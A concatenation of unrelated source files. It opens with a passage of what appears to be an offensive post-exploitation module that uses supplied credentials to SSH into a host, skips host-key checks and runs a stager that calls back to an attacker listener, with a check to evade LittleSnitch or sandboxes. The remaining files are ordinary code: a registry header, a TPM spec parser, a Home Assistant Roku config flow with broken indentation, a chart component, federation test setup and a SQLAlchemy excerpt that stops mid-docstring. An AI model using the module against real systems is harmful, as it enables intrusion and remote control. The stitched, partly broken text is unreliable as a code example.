            # list of any references/other comments
            'Comments': [
                'http://stackoverflow.com/questions/17118239/how-to-give-subprocess-a-password-and-get-stdout-at-the-same-time'
            ]
        }

        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent' : {
                # The 'Agent' option is the only one that MUST be in a module
                'Description' : 'Agent to use ssh from.',
                'Required' : True,
                'Value' : ''
            },
            'Login' : {
                'Description' : '[email protected]',
                'Required' : True,
                'Value' : ''
            },
            'Password' : {
                'Description' : 'Password',
                'Required' : True,
                'Value' : ''
            },
            'Listener' : {
                'Description' : 'Listener to use.',
                'Required' : True,
                'Value' : ''
            },
            'SafeChecks' : {
                'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
                'Required' : True,
                'Value' : 'True'
            },
            'UserAgent' : {
                'Description' : 'User-agent string to use for the staging request (default, none, or other).',
                'Required' : False,
                'Value' : 'default'
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        # like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        # During instantiation, any settable option parameters
        # are passed as an object set to the module and the
        # options dictionary is automatically set. This is mostly
        # in case options are passed on the command line
        if params:
            for param in params:
                # parameter format is [Name, Value]
                option, value = param
                if option in self.options:
                    self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the Python 2 source the agent runs to SSH out and stage."""
        login = self.options['Login']['Value']
        password = self.options['Password']['Value']
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        safeChecks = self.options['SafeChecks']['Value']

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', userAgent=userAgent, safeChecks=safeChecks)
        # Escape quotes so the launcher survives embedding in the ssh command.
        launcher = launcher.replace("'", "\\'")
        launcher = launcher.replace('"', '\\"')
        if launcher == "":
            print(helpers.color("[!] Error in launcher command generation."))
            return ""
        # NOTE(review): a literal '%' inside `launcher` would break the
        # old-style % interpolation below — confirm launchers are %-free.
        script = """
import os
import pty

def wall(host, pw):
    import os,pty
    pid, fd = pty.fork()
    if pid == 0:
        os.execvp('ssh', ['ssh', '-o StrictHostKeyChecking=no', host, '%s'])
        os._exit(1)
    os.read(fd, 1024)
    os.write(fd, '\\n' + pw + '\\n')
    result = []
    while True:
        try:
            data = os.read(fd, 1024)
            if data[:8] == "Password" and data[-1:] == ":":
                os.write(fd, pw + '\\n')
        except OSError:
            break
        if not data:
            break
        result.append(data)
    pid, status = os.waitpid(pid, 0)
    return status, ''.join(result)

status, output = wall('%s','%s')
print status
print output
""" % (launcher, login, password)
        return script
|
//-------------------------------------------------------------------------------------------------
// <copyright file="regutil.h" company="Microsoft">
// Copyright (c) Microsoft Corporation. All rights reserved.
//
// The use and distribution terms for this software are covered by the
// Common Public License 1.0 (http://opensource.org/licenses/cpl1.0.php)
// which can be found in the file CPL.TXT at the root of this distribution.
// By using this software in any fashion, you are agreeing to be bound by
// the terms of this license.
//
// You must not remove this notice, or any other, from this software.
// </copyright>
//
// <summary>
// Registry helper functions.
// </summary>
//-------------------------------------------------------------------------------------------------
#pragma once
#ifdef __cplusplus
extern "C" {
#endif
// Close an open registry key and reset the handle to NULL.
// Wrapped in do/while(0) so the macro expands to exactly one statement and
// composes safely with if/else — the previous bare `if (h) { ... }` form
// would bind a following `else` to the macro's internal `if`.
#define ReleaseRegKey(h) do { if (h) { ::RegCloseKey(h); h = NULL; } } while (0)
#ifdef __cplusplus
}
#endif
|
def query():
    """Return the SQL text that selects Field_1 from Table_1."""
    return '''SELECT Field_1 FROM Table_1 '''
# -*- coding: utf-8 -*-
import re
from modules import data_structures
from modules import utils
from modules.extractors.pdf.tpm2_partx_extraction_navigator_pdf import ExtractionNavigator
import settings
class SptRoutinesPDF(ExtractionNavigator):
    """Extracts the TPM 2.0 Part 4 "Supporting Routines" source code from the
    text of the specification PDF.

    NOTE(review): ``file`` is used both with ``re.search`` and with
    ``readline``/``seek``/``tell`` — presumably an mmap-style buffer; confirm.
    NOTE(review): indentation was reconstructed from a whitespace-mangled
    source; verify block nesting against the original file.
    """

    def handle_cryptographic_functions(self, file, sub_path, section_number, sub_section_number):
        """Extract the x.y.z sub-subsections (one *.c/*.h file each) that make
        up the cryptographic Headers/Source groupings."""
        function = ""
        sub_sub_section_number = 0
        # Advance x.y.1, x.y.2, ... until the heading of the NEXT sub-section
        # (x.(y+1)) naming a .c/.h file shows up in `function`.
        while not (section_number + "\." + str(sub_section_number + 1) in function and (function.strip().endswith(".c") or function.strip().endswith(".h"))):
            sub_sub_section_number += 1
            regex = "\n[ ]*" + section_number + "\." + str(sub_section_number) + "\." + str(sub_sub_section_number) + "[ ]*(.*\.c|.*\.h)"
            result = re.search(regex, file)
            if result:
                function = result.group(1)
                print " * " + function.strip()
            else:
                break
            f = self.extract_code_blocks_cryptographic_functions(file, section_number, sub_section_number, sub_sub_section_number)
            f.name = function.strip()
            f.short_name = f.name[:-2]
            f.file_name = f.name.replace("()", ".c")
            f.folder_name = sub_path
            self.functions.append(f)

    # Extract support routine code blocks
    # Parameters;
    #   file
    #   section_number
    #   sub_section_number
    # Returns:
    #   list of code blocks found in given part of file
    def extract_code_blocks(self, file, section_number, sub_section_number):
        code_blocks = data_structures.TPM2_Partx_File()
        ###################################################################
        # FUNCTIONS BLOCKS (START)
        code_found = False
        table_found = False
        code_offset = 0
        while True:
            line = file.readline()[:-1]
            if line == "":
                continue
            # end of page, either break, or calculate new offsets
            if "Page" in line and "Family" in line:
                for i in range(0, 5):
                    line = file.readline()[:-1]
                    # The "Part 4:" running header fixes the code indentation
                    # offset for the new page.
                    if re.search("Part[ ]+4:", line):
                        code_offset = len(re.search("\f([ ]*).*", line).group(1))
                    # Reaching an Annex heading means no more routine sections.
                    if "Annex" in line:
                        return code_blocks
            # Next sub-section heading terminates this block.
            if line.strip().startswith(section_number + "." + str(int(sub_section_number) +1)):
                break
            # Next top-level section heading: push the line back and stop.
            if (line.startswith(" ") and str(int(section_number) + 1) + " " in line.strip()
                    and not section_number + "." + str(sub_section_number) in line):
                file.seek(file.tell() - len(line))
                break
            # Numbered listing line => source code.
            result1 = re.search("^(\d{1,4}[ ]*)(.*)", line)
            if result1:
                code_found = True
                table_found = False
                if code_offset == 0:
                    code_offset = len(result1.group(1))
                code_line = line[code_offset:]
                code_blocks.append(data_structures.TPM2_Partx_CodeLine(code_line))
            # "Error Returns / Meaning" header starts a table.
            result2 = re.search("([ ]*Error Returns[ ]+Meaning.*)", line)
            if result2:
                table_found = True
                row = result2.group(1)+"\n"
                results = re.split("[ ]{5,}", row)
                offsets = []
                l = []
                for r in results:
                    r = r.strip()
                    l.append(r)
                    offsets.append(line.find(r))
                code_blocks.append(data_structures.TPM2_Partx_Table(None, None, None, l))
            elif table_found:
                # Continuation row of the current table, split at the column
                # offsets captured from the header row.
                row = line + "\n"
                row = utils.split_row(row, offsets)
                code_blocks.elements[len(code_blocks.elements)-1].append(row)
            elif line.strip().startswith(section_number + "." + str(int(sub_section_number) +1)):
                break
            # Indented, unnumbered text outside code/tables => prose comment.
            result2 = re.search("^[ ]{2,}(.*)", line)
            if not (table_found or code_found) and result2:
                code_blocks.append(data_structures.TPM2_Partx_CommentLine(result2.group(1)))
            if not (result1 or result2):
                break
        # FUNCTIONS BLOCKS (END)
        ###################################################################
        return code_blocks

    # Extract next function from file
    # Parameters;
    #   file
    #   section_number
    #   sub_section_number
    # Returns:
    #   string containing function
    #   sub_section_number
    def next_function(self, file, section_number, sub_section_number):
        function = ""
        # Spec revision 138 headings lack the file-name suffix pattern.
        if settings.SPEC_VERSION_INT == 138:
            result = re.search("\n[ ]*" + section_number + "\." + str(sub_section_number) + "[ ]+(.*?[^.\d]{2,})\n", file)
        else:
            result = re.search("\n[ ]*" + section_number + "\." + str(sub_section_number) + "[ ]+(.*?[^.\d]{2,}(.c|.h|\(.*?\)))\n", file)
        if result:
            function = result.group(1)
            file.seek(result.end())
        # Keep scanning sub-sections until a heading looks like a function or
        # file entry (ends with ".c", ")" or is a Headers/Source grouping).
        while not (function.strip().endswith(".c") or function.strip().endswith(")") or "Headers" in function or "Source" in function):
            sub_section_number += 1
            if settings.SPEC_VERSION_INT == 138:
                result = re.search("\n[ ]*" + section_number + "\." + str(sub_section_number) + "[ ]+(.*?[^.\d]{2,})\n", file)
            else:
                result = re.search("\n[ ]*" + section_number + "\." + str(sub_section_number) + "[ ]+(.*?[^.\d]{2,}(.c|.h|\(.*?\)))\n", file)
            if result:
                function = result.group(1)
                file.seek(result.end())
            else:
                return None, None
        return function, sub_section_number

    # Append all functions from file to the list of functions
    # Parameters;
    #   file
    #   section_number
    #   sub_path
    def extract_function(self, file, section_number, sub_path):
        sub_section_number = 1
        function, sub_section_number = self.next_function(file, section_number, sub_section_number) # find first function entry
        while function is not None: # iterate over function entries
            print " * " + function.strip()
            # Section 10 contains the cryptographic Headers/Source groupings,
            # which carry an extra sub-subsection level.
            if section_number == "10" and ("Headers" in function or "Source" in function):
                self.handle_cryptographic_functions(file, sub_path, section_number, sub_section_number)
                sub_section_number += 1
                function, sub_section_number = self.next_function(file, section_number, sub_section_number) # find next function entry
                continue
            f = self.extract_code_blocks(file, section_number, sub_section_number)
            # Special-cased entries with fixed output file names:
            if "CommandDispatcher()" in function:
                f.file_name = "CommandDispatcher_fp.h"
                f.name = "CommandDispatcher_fp.h"
                f.short_name = "CommandDispatcher"
                f.folder_name = sub_path
            elif "ParseHandleBuffer()" in function:
                f.file_name = "HandleProcess_fp.h"
                f.name = "HandleProcess_fp.h"
                f.short_name = "HandleProcess"
                f.folder_name = sub_path
            elif "Marshal.c" in function:
                # Marshal.c is skipped entirely.
                sub_section_number += 1
                function, sub_section_number = self.next_function(file, section_number, sub_section_number) # find next function entry
                continue
            else:
                # Derive the file name from the parenthesized heading part,
                # falling back to "<name>.c".
                result = re.search(".*?\((.*?)\)", function)
                if result:
                    f.file_name = result.group(1)
                    f.name = result.group(1)
                else:
                    f.file_name = function.strip().replace("()", ".c")
                    f.name = function.strip()
                f.short_name = f.name[:-2]
                f.folder_name = sub_path
            self.functions.append(f)
            sub_section_number += 1
            function, sub_section_number = self.next_function(file, section_number, sub_section_number) # find next function entry

    # Extract support routine annex code blocks
    # Parameters;
    #   file
    #   section_number
    #   sub_section_number
    # Returns:
    #   list of code blocks found in given part of file
    def extract_code_blocks_cryptographic_functions(self, file, section_number, sub_section_number, sub_sub_section_number=None):
        code_blocks = data_structures.TPM2_Partx_File()
        ###################################################################
        # FUNCTIONS BLOCKS (START)
        code_found = False
        table_found = False
        code_offset = 0
        while True:
            line = file.readline()[:-1]
            if line == "":
                continue
            # end of page, either break, or calculate new offsets
            if "Page" in line and "Family" in line:
                for i in range(0, 5):
                    line = file.readline()
                    # The running header fixes the indentation offset.
                    if "Part 4: Supporting Routines" in line:
                        result1 = re.search("([ ]+)(.*)\n", line)
                        if result1:
                            code_offset = len(result1.group(1))
            # Next sub-section heading: push the line back and stop.
            if line.strip().startswith(section_number + "." + str(int(sub_section_number) +1)):
                file.seek(file.tell() - len(line))
                break
            # Next sub-subsection heading terminates this block.
            if sub_sub_section_number and line.strip().startswith(section_number + "." + str(sub_section_number) + "." + str(int(sub_sub_section_number) +1)):
                break
            # Numbered listing line => source code.
            result1 = re.search("^(\d{1,4})(.*)", line)
            if result1:
                code_found = True
                table_found = False
                line_number = result1.group(1)
                code_line = result1.group(2)
                if code_offset == 0:
                    code_line = code_line.strip()
                    code_offset = max(line.find(code_line), len(line_number) + 2)
                else:
                    code_line = code_line[code_offset-len(line_number):]
                code_blocks.append(data_structures.TPM2_Partx_CodeLine(code_line))
            # "Error Returns / Meaning" header starts a table.
            result2 = re.search("([ ]*Error Returns[ ]+Meaning.*)", line)
            if result2:
                table_found = True
                row = result2.group(1)+"\n"
                results = re.split("[ ]{5,}", row)
                offsets = []
                l = []
                for r in results:
                    r = r.strip()
                    l.append(r)
                    offsets.append(line.find(r))
                code_blocks.append(data_structures.TPM2_Partx_Table(None, None, None, l))
            elif table_found:
                # Continuation row of the current table.
                row = line + "\n"
                row = utils.split_row(row, offsets)
                code_blocks.elements[len(code_blocks.elements)-1].append(row)
            elif line.strip().startswith(section_number + "." + str(int(sub_section_number) +1)):
                break
            elif sub_sub_section_number and line.strip().startswith(section_number + "." + str(sub_section_number) + "." + str(int(sub_sub_section_number) + 1)):
                break
            # Indented, unnumbered text outside code/tables => prose comment.
            result2 = re.search("^[ ]{2,}(.*)", line)
            if not (table_found or code_found) and result2:
                code_blocks.append(data_structures.TPM2_Partx_CommentLine(""))
                code_blocks.append(data_structures.TPM2_Partx_CommentLine(result2.group(1)))
                # reset code status for comments
                code_found = False
            if not (result1 or result2):
                break
        # FUNCTIONS BLOCKS (END)
        ###################################################################
        return code_blocks
|
"""Config flow for Roku."""
import logging
from typing import Any, Dict, Optional
from urllib.parse import urlparse
from rokuecp import Roku, RokuError
import voluptuous as vol
from homeassistant.components.ssdp import (
ATTR_SSDP_LOCATION,
ATTR_UPNP_FRIENDLY_NAME,
ATTR_UPNP_SERIAL,
)
from homeassistant.config_entries import CONN_CLASS_LOCAL_POLL, ConfigFlow
from homeassistant.const import CONF_HOST, CONF_NAME
from homeassistant.core import callback
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.typing import HomeAssistantType
from .const import DOMAIN # pylint: disable=unused-import
DATA_SCHEMA = vol.Schema({vol.Required(CONF_HOST): str})
ERROR_CANNOT_CONNECT = "cannot_connect"
ERROR_UNKNOWN = "unknown"
_LOGGER = logging.getLogger(__name__)
async def validate_input(hass: HomeAssistantType, data: Dict) -> Dict:
    """Validate the user input allows us to connect.

    Data has the keys from DATA_SCHEMA with values provided by the user.
    """
    client = Roku(data[CONF_HOST], session=async_get_clientsession(hass))
    device = await client.update()
    info = device.info
    return {"title": info.name, "serial_number": info.serial_number}
class RokuConfigFlow(ConfigFlow, domain=DOMAIN):
"""Handle a Roku config flow."""
VERSION = 1
CONNECTION_CLASS = CONN_CLASS_LOCAL_POLL
    def __init__(self):
        """Set up the instance."""
        # Host/name data accumulated across the discovery steps below.
        self.discovery_info = {}
    @callback
    def _show_form(self, errors: Optional[Dict] = None) -> Dict[str, Any]:
        """Show the user-input form, optionally annotated with errors."""
        return self.async_show_form(
            step_id="user",
            data_schema=DATA_SCHEMA,
            errors=errors or {},
        )
    async def async_step_user(
        self, user_input: Optional[Dict] = None
    ) -> Dict[str, Any]:
        """Handle a flow initialized by the user."""
        # First call (no input yet): render the empty form.
        if not user_input:
            return self._show_form()

        errors = {}

        try:
            info = await validate_input(self.hass, user_input)
        except RokuError:
            _LOGGER.debug("Roku Error", exc_info=True)
            errors["base"] = ERROR_CANNOT_CONNECT
            # Connection failure is recoverable: re-render the form.
            return self._show_form(errors)
        except Exception:  # pylint: disable=broad-except
            _LOGGER.exception("Unknown error trying to connect")
            return self.async_abort(reason=ERROR_UNKNOWN)

        # The device serial is the unique id, so the same Roku is configured
        # only once; refresh the stored host if it changed.
        await self.async_set_unique_id(info["serial_number"])
        self._abort_if_unique_id_configured(updates={CONF_HOST: user_input[CONF_HOST]})

        return self.async_create_entry(title=info["title"], data=user_input)
async def async_step_homekit(self, discovery_info):
"""Handle a flow initialized by homekit discovery."""
# If we already have the host configured do
# not open connections to it if we can avoid it.
if self._host_already_configured(discovery_info[CONF_HOST]):
return self.async_abort(reason="already_configured")
self.discovery_info.update({CONF_HOST: discovery_info[CONF_HOST]})
try:
info = await validate_input(self.hass, self.discovery_info)
except RokuError:
_LOGGER.debug("Roku Error", exc_info=True)
return self.async_abort(reason=ERROR_CANNOT_CONNECT)
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unknown error trying to connect")
return self.async_abort(reason=ERROR_UNKNOWN)
await self.async_set_unique_id(info["serial_number"])
self._abort_if_unique_id_configured(
updates={CONF_HOST: discovery_info[CONF_HOST]},
)
# pylint: disable=no-member # https://github.com/PyCQA/pylint/issues/3167
self.context.update({"title_placeholders": {"name": info["title"]}})
self.discovery_info.update({CONF_NAME: info["title"]})
return await self.async_step_discovery_confirm()
async def async_step_ssdp(
self, discovery_info: Optional[Dict] = None
) -> Dict[str, Any]:
"""Handle a flow initialized by discovery."""
host = urlparse(discovery_info[ATTR_SSDP_LOCATION]).hostname
name = discovery_info[ATTR_UPNP_FRIENDLY_NAME]
serial_number = discovery_info[ATTR_UPNP_SERIAL]
await self.async_set_unique_id(serial_number)
self._abort_if_unique_id_configured(updates={CONF_HOST: host})
# pylint: disable=no-member # https://github.com/PyCQA/pylint/issues/3167
self.context.update({"title_placeholders": {"name": name}})
self.discovery_info.update({CONF_HOST: host, CONF_NAME: name})
try:
await validate_input(self.hass, self.discovery_info)
except RokuError:
_LOGGER.debug("Roku Error", exc_info=True)
return self.async_abort(reason=ERROR_CANNOT_CONNECT)
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unknown error trying to connect")
return self.async_abort(reason=ERROR_UNKNOWN)
return await self.async_step_discovery_confirm()
async def async_step_discovery_confirm(
self, user_input: Optional[Dict] = None
) -> Dict[str, Any]:
"""Handle user-confirmation of discovered device."""
# pylint: disable=no-member # https://github.com/PyCQA/pylint/issues/3167
if user_input is None:
return self.async_show_form(
step_id="discovery_confirm",
description_placeholders={"name": self.discovery_info[CONF_NAME]},
errors={},
)
return self.async_create_entry(
title=self.discovery_info[CONF_NAME],
data=self.discovery_info,
)
def _host_already_configured(self, host):
"""See if we already have a hub with the host address configured."""
existing_hosts = {
entry.data[CONF_HOST]
for entry in self._async_current_entries()
if CONF_HOST in entry.data
}
return host in existing_hosts
|
var component = FlowComponents.define('hbar.breakdown', function(props) {
  // Expose the prop-supplied reactive getters under stable state names.
  this.setFn('sortOptions', props.sortOptionsFn);
  this.setFn('selectedItem', props.selectedItemFn);
  this.setFn('commonValueLabel', props.commonValueLabelFn);
  this.metricDataKey = props.metricDataKey;

  // Re-run the breakdown query whenever the URL args or the chosen
  // sort metric change.
  this.autorun(function() {
    var queryArgs = this.getArgs(props);
    var availableSorts = props.sortOptionsFn();
    var activeSort = this.getSortedMetric(availableSorts);
    queryArgs.sortBy = activeSort;
    this.set('sortedItem', activeSort);
    this.kdFindMetrics('breakdown', this.metricDataKey, queryArgs);
  });

  // Mirror the selection query parameter into component state.
  this.autorun(function() {
    this.set('selectedItem', this.getSelectionArg());
  });
});
// Build the data rows for the horizontal bar chart. Each row carries
// the raw sorted/common values plus their percentage of the column max,
// so the template can size the bars.
component.state.chartData = function() {
  var self = this;
  var data = this.kdMetrics('breakdown').fetch() || [];
  var hbarData = [];

  // Guard: on an empty result set _.max() returns -Infinity, whose
  // property access yields undefined and would poison the percentage
  // math below with NaN.
  if (data.length === 0) {
    return hbarData;
  }

  var sortedValueMax = getMaxValue('sortedValue');
  var commonValueMax = getMaxValue('commonValue');

  data.forEach(function(d) {
    var obj = {
      id: d.id,
      sortedValueTitle: d.sortValueTitle,
      sortedValue: d.sortedValue,
      pSortedValue: getPct(d.sortedValue, sortedValueMax)
    };

    // commonValue is optional per-row; only emit its fields when present.
    if (d.commonValue !== undefined) {
      obj.commonValueTitle = self.get('commonValueLabel');
      obj.commonValue = d.commonValue;
      obj.pCommonValue = getPct(d.commonValue, commonValueMax);
    }

    hbarData.push(obj);
  });

  // Largest value of `key` across the fetched rows (data is non-empty here).
  function getMaxValue(key) {
    var valueMax = _.max(data, function(obj) {
      return obj[key];
    });
    return valueMax[key];
  }

  // Percentage of maxValue; 0 when the max is 0/undefined so we never
  // produce Infinity or NaN bar widths.
  function getPct(value, maxValue) {
    if (!maxValue) {
      return 0;
    }
    return value / maxValue * 100;
  }

  return hbarData;
};
// The chart is loading until the breakdown metrics subscription is ready.
component.state.isChartLoading = function() {
  var metricsCursor = this.kdMetrics('breakdown');
  return !metricsCursor.ready();
};
// Persist the chosen sort metric in the URL; the autorun in the
// component definition reacts to the query-param change.
component.action.changeSortOrder = function(sortMetric) {
  var queryParams = { metric: sortMetric };
  FlowRouter.setQueryParams(queryParams);
};
// Persist the current selection in the URL so it survives reloads and
// is picked up by the selection autorun.
component.action.changeSelection = function(newSelection) {
  var queryParams = { selection: newSelection };
  FlowRouter.setQueryParams(queryParams);
};
// Mix in helpers used above — presumably KadiraData.FlowMixin supplies
// kdFindMetrics/kdMetrics and Mixins.Params supplies getArgs/
// getSortedMetric/getSelectionArg; confirm against the mixin sources.
component.extend(KadiraData.FlowMixin);
component.extend(Mixins.Params);
|
import importlib
import os
import sys
from urllib.parse import quote_plus
from urllib.parse import unquote_plus
from fedoidc.bundle import FSJWKSBundle
from fedoidc.bundle import keyjar_to_jwks_private
from fedoidc.file_system import FileSystem
from fedoidc.operator import Operator
from fedoidc.signing_service import InternalSigningService
from fedoidc.signing_service import Signer
from fedoidc.test_utils import make_fs_jwks_bundle
from fedoidc.test_utils import make_signed_metadata_statement
from oic.utils.keyio import build_keyjar
def create_signers(jb, ms_path, csms_def, fos):
    """Construct Signer instances for a set of issuers.

    Issuers listed in ``csms_def`` get a metadata-statement path per
    usage; federation operators in ``fos`` get a bare signing service.
    Note a FO that also appears in ``csms_def`` is overwritten by the
    plain Signer from the second loop.
    """
    signers = {}

    for iss, usage_spec in csms_def.items():
        # One directory per (issuer, usage) pair; the issuer is URL-quoted
        # because it is typically an URL.
        paths = {
            usage: os.path.join(ms_path, quote_plus(iss), usage)
            for usage in usage_spec
        }
        signers[iss] = Signer(InternalSigningService(iss, jb[iss]), paths)

    for fo in fos:
        signers[fo] = Signer(InternalSigningService(fo, jb[fo]))

    return signers
def setup(keydefs, tool_iss, liss, csms_def, oa, ms_path):
    """Build the federation test fixtures: signers plus a JWKS bundle.

    Returns a ``(signers, key_bundle)`` tuple.
    """
    # A file-system based bundle of public keys for all listed issuers.
    fresh_keys = build_keyjar(keydefs)[1]
    key_bundle = make_fs_jwks_bundle(tool_iss, liss, fresh_keys, keydefs, './')

    # A second, independently generated key set backs the FO bundle.
    sig_keys = build_keyjar(keydefs)[1]
    jb = FSJWKSBundle(tool_iss, sig_keys, 'fo_jwks',
                      key_conv={'to': quote_plus, 'from': unquote_plus})

    # Need to save the private parts
    jb.bundle.value_conv['to'] = keyjar_to_jwks_private
    jb.bundle.sync()

    operator = {
        entity: Operator(iss=entity, keyjar=_keyjar)
        for entity, _keyjar in jb.items()
    }

    signers = {}
    for sig, sms_def in csms_def.items():
        ms_dir = os.path.join(ms_path, sig)
        metadata_statements = FileSystem(ms_dir)

        # Persist one signed metadata statement per spec name.
        for name, spec in sms_def.items():
            metadata_statements[name] = make_signed_metadata_statement(
                spec, operator)['ms']

        _iss = oa[sig]
        signers[_iss] = Signer(
            InternalSigningService(_iss, operator[_iss].keyjar), ms_dir)

    return signers, key_bundle
def fed_setup(args):
    """Load the federation config module named by ``args.fed_config``
    and run :func:`setup` over all entity groups defined in it."""
    # Make the current working directory importable so the config
    # module can be resolved by name.
    sys.path.insert(0, ".")
    config = importlib.import_module(args.fed_config)

    # Collect every issuer: FOs, OAs, IAs and EOs, in that order.
    _liss = []
    for group in (config.FO, config.OA, config.IA, config.EO):
        _liss.extend(group.values())

    return setup(config.KEY_DEFS, config.TOOL_ISS, _liss, config.SMS_DEF,
                 config.OA, args.ms_path)
|
# orm/mapper.py
# Copyright (C) 2005-2019 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Logic to map Python classes to and from selectables.
Defines the :class:`~sqlalchemy.orm.mapper.Mapper` class, the central
configurational unit which associates a class with a database table.
This is a semi-private module; the main configurational API of the ORM is
available in :mod:`sqlalchemy.orm`.
"""
from __future__ import absolute_import
from collections import deque
from itertools import chain
import sys
import types
import weakref
from . import attributes
from . import exc as orm_exc
from . import instrumentation
from . import loading
from . import properties
from . import util as orm_util
from .base import _class_to_mapper
from .base import _INSTRUMENTOR
from .base import _state_mapper
from .base import class_mapper
from .base import state_str
from .interfaces import _MappedAttribute
from .interfaces import EXT_SKIP
from .interfaces import InspectionAttr
from .interfaces import MapperProperty
from .path_registry import PathRegistry
from .. import event
from .. import exc as sa_exc
from .. import inspection
from .. import log
from .. import schema
from .. import sql
from .. import util
from ..sql import expression
from ..sql import operators
from ..sql import util as sql_util
from ..sql import visitors
# Registry of all live Mapper objects; weak keys let mappers for
# garbage-collected classes be reclaimed.
_mapper_registry = weakref.WeakKeyDictionary()

# Guard flag — presumably used to detect re-entrant mapper
# configuration; its use is not visible in this chunk.
_already_compiling = False

# Decorator factory for memoized properties that are expired together
# (see Mapper._expire_memoizations in __init__).
_memoized_configured_property = util.group_expirable_memoized_property()


# a constant returned by _get_attr_by_column to indicate
# this mapper is not handling an attribute for a particular
# column
NO_ATTRIBUTE = util.symbol("NO_ATTRIBUTE")

# lock used to synchronize the "mapper configure" step
_CONFIGURE_MUTEX = util.threading.RLock()
@inspection._self_inspects
@log.class_logger
class Mapper(InspectionAttr):
    """Define the correlation of class attributes to database table
    columns.

    The :class:`.Mapper` object is instantiated using the
    :func:`~sqlalchemy.orm.mapper` function.  For information
    about instantiating new :class:`.Mapper` objects, see
    that function's documentation.

    When :func:`.mapper` is used
    explicitly to link a user defined class with table
    metadata, this is referred to as *classical mapping*.
    Modern SQLAlchemy usage tends to favor the
    :mod:`sqlalchemy.ext.declarative` extension for class
    configuration, which
    makes usage of :func:`.mapper` behind the scenes.

    Given a particular class known to be mapped by the ORM,
    the :class:`.Mapper` which maintains it can be acquired
    using the :func:`.inspect` function::

        from sqlalchemy import inspect

        mapper = inspect(MyClass)

    A class which was mapped by the :mod:`sqlalchemy.ext.declarative`
    extension will also have its mapper available via the ``__mapper__``
    attribute.

    """

    # Class-level flag set to True at the end of __init__ whenever a new
    # mapper is constructed (see __init__).
    _new_mappers = False
    # Presumably flipped when dispose() is called on this mapper — the
    # setter is not visible in this chunk.
    _dispose_called = False
def __init__(
self,
class_,
local_table=None,
properties=None,
primary_key=None,
non_primary=False,
inherits=None,
inherit_condition=None,
inherit_foreign_keys=None,
extension=None,
order_by=False,
always_refresh=False,
version_id_col=None,
version_id_generator=None,
polymorphic_on=None,
_polymorphic_map=None,
polymorphic_identity=None,
concrete=False,
with_polymorphic=None,
polymorphic_load=None,
allow_partial_pks=True,
batch=True,
column_prefix=None,
include_properties=None,
exclude_properties=None,
passive_updates=True,
passive_deletes=False,
confirm_deleted_rows=True,
eager_defaults=False,
legacy_is_orphan=False,
_compiled_cache_size=100,
):
r"""Return a new :class:`~.Mapper` object.
This function is typically used behind the scenes
via the Declarative extension. When using Declarative,
many of the usual :func:`.mapper` arguments are handled
by the Declarative extension itself, including ``class_``,
``local_table``, ``properties``, and ``inherits``.
Other options are passed to :func:`.mapper` using
the ``__mapper_args__`` class variable::
class MyClass(Base):
__tablename__ = 'my_table'
id = Column(Integer, primary_key=True)
type = Column(String(50))
alt = Column("some_alt", Integer)
__mapper_args__ = {
'polymorphic_on' : type
}
Explicit use of :func:`.mapper`
is often referred to as *classical mapping*. The above
declarative example is equivalent in classical form to::
my_table = Table("my_table", metadata,
Column('id', Integer, primary_key=True),
Column('type', String(50)),
Column("some_alt", Integer)
)
class MyClass(object):
pass
mapper(MyClass, my_table,
polymorphic_on=my_table.c.type,
properties={
'alt':my_table.c.some_alt
})
.. seealso::
:ref:`classical_mapping` - discussion of direct usage of
:func:`.mapper`
:param class\_: The class to be mapped. When using Declarative,
this argument is automatically passed as the declared class
itself.
:param local_table: The :class:`.Table` or other selectable
to which the class is mapped. May be ``None`` if
this mapper inherits from another mapper using single-table
inheritance. When using Declarative, this argument is
automatically passed by the extension, based on what
is configured via the ``__table__`` argument or via the
:class:`.Table` produced as a result of the ``__tablename__``
and :class:`.Column` arguments present.
:param always_refresh: If True, all query operations for this mapped
class will overwrite all data within object instances that already
exist within the session, erasing any in-memory changes with
whatever information was loaded from the database. Usage of this
flag is highly discouraged; as an alternative, see the method
:meth:`.Query.populate_existing`.
:param allow_partial_pks: Defaults to True. Indicates that a
composite primary key with some NULL values should be considered as
possibly existing within the database. This affects whether a
mapper will assign an incoming row to an existing identity, as well
as if :meth:`.Session.merge` will check the database first for a
particular primary key value. A "partial primary key" can occur if
one has mapped to an OUTER JOIN, for example.
:param batch: Defaults to ``True``, indicating that save operations
of multiple entities can be batched together for efficiency.
Setting to False indicates
that an instance will be fully saved before saving the next
instance. This is used in the extremely rare case that a
:class:`.MapperEvents` listener requires being called
in between individual row persistence operations.
:param column_prefix: A string which will be prepended
to the mapped attribute name when :class:`.Column`
objects are automatically assigned as attributes to the
mapped class. Does not affect explicitly specified
column-based properties.
See the section :ref:`column_prefix` for an example.
:param concrete: If True, indicates this mapper should use concrete
table inheritance with its parent mapper.
See the section :ref:`concrete_inheritance` for an example.
:param confirm_deleted_rows: defaults to True; when a DELETE occurs
of one more rows based on specific primary keys, a warning is
emitted when the number of rows matched does not equal the number
of rows expected. This parameter may be set to False to handle the
case where database ON DELETE CASCADE rules may be deleting some of
those rows automatically. The warning may be changed to an
exception in a future release.
.. versionadded:: 0.9.4 - added
:paramref:`.mapper.confirm_deleted_rows` as well as conditional
matched row checking on delete.
:param eager_defaults: if True, the ORM will immediately fetch the
value of server-generated default values after an INSERT or UPDATE,
rather than leaving them as expired to be fetched on next access.
This can be used for event schemes where the server-generated values
are needed immediately before the flush completes. By default,
this scheme will emit an individual ``SELECT`` statement per row
inserted or updated, which note can add significant performance
overhead. However, if the
target database supports :term:`RETURNING`, the default values will
be returned inline with the INSERT or UPDATE statement, which can
greatly enhance performance for an application that needs frequent
access to just-generated server defaults.
.. seealso::
:ref:`orm_server_defaults`
.. versionchanged:: 0.9.0 The ``eager_defaults`` option can now
